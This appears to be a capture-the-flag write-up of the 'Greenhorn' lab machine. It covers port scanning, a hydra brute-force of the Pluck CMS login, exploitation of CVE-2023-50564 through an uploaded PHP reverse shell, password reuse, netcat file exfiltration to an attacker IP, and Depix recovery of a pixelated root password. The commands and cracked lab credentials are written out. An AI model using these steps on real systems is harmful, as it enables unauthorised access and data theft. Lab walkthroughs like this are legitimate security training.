Greenhorn

Created At: Updated At:
Keywords: linux

Recon

└──╼ $nmap -p- -A greenhorn.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 08:25 UTC
Nmap scan report for greenhorn.htb (10.129.178.31)
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_  256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-title: Welcome to GreenHorn ! - GreenHorn
|_Requested resource was http://greenhorn.htb/?file=welcome-to-greenhorn
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-generator: pluck 4.7.18
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/data/ /docs/
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=f8472946e7bb7aee; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=10zNRFqpKaYuRFW_9-ZNG2Lip3U6MTcyNDE0MjI5MzcwMzQ2NDk2OA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 20 Aug 2024 08:24:53 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=937130857acd1ee9; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=wEK50eH4jJ0NOpyY-HHhkxBO6DA6MTcyNDE0MjI5ODc4OTQ0NTMxNQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 20 Aug 2024 08:24:58 GMT
|_    Content-Length: 0
└──╼ $gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://greenhorn.htb  --append-domain -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://greenhorn.htb
[+] Method:          GET
[+] Threads:         200
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 3000000 / 3000001 (100.00%)
===============================================================
Finished
===============================================================

Most of the sites return 200, but then show:

Gitea

gitea is located on port 3000.
We can create an account and discover one repo on it.

We can find one other person watching this repo, its admin.

No CVE and no interesting files.

addon

What I found later, there is no need to use hydra as on gitea there is a file GreenHorn/data/settings/pass.php with a hash.

<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

We can crack it and get password for pluck and not brute force with hydra.

CVE-2023-50564

Our main target seems to be:

Pluck tells us its version and it has a CVE ready for us.
https://nvd.nist.gov/vuln/detail/CVE-2023-50564

All of the scripts require username and password, which we do not have.
We can “fix” this, running hydra

└──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt greenhorn.htb http-post-form "/login.php:cont1=^PASS^&bogus=&submit=Log+in:F=Password incorrect."
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-20 09:45:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://greenhorn.htb:80/login.php:cont1=^PASS^&bogus=&submit=Log+in:F=Password incorrect.
[80][http-post-form] host: greenhorn.htb   login: admin   password: iloveyou1
1 of 1 target successfully completed, 1 valid password found

We are in, time to try out the CVE.
https://www.exploit-db.com/exploits/51592

ALL of the scripts did not work for me. I ended up uploading manually php-reverse-shell in a zip and it did work, so I do not understand why those scripts were even created.

User access

First, shell stablisation.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fg

Linpeas returns nothing of value.

pspy:

After wasting too much time, Ive tried as a joke to login to user “junior” with the same password as earlier and it worked. Dissapointing.

Priv esc

In our home folder we have a file called “Using OpenVAS.pdf”.
We can send it back to us using netcat.

# attacker
nc -l -p 12345 > received_file.pdf

# victim
nc 10.10.14.81 12345 < file_to_send.pdf

There has to be a way to get the distorted password back.

I’ve tried https://github.com/bishopfox/unredacter and it failed to do anything. I’ve tried getting data with strings command and hexedit, nothing. I’ve tried https://github.com/spipm/Depix and at first gave it input in .png format. Converiting to .ppm made it work.

pdfimages file.pdf file
python3 depix.py     -p /home/user/Desktop/file-000.ppm     -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png     -o /home/user/Desktop/output.png

password: sidefromsidetheothersidesidefromsidetheotherside

We are done here. One of the worst rooms I’ve done.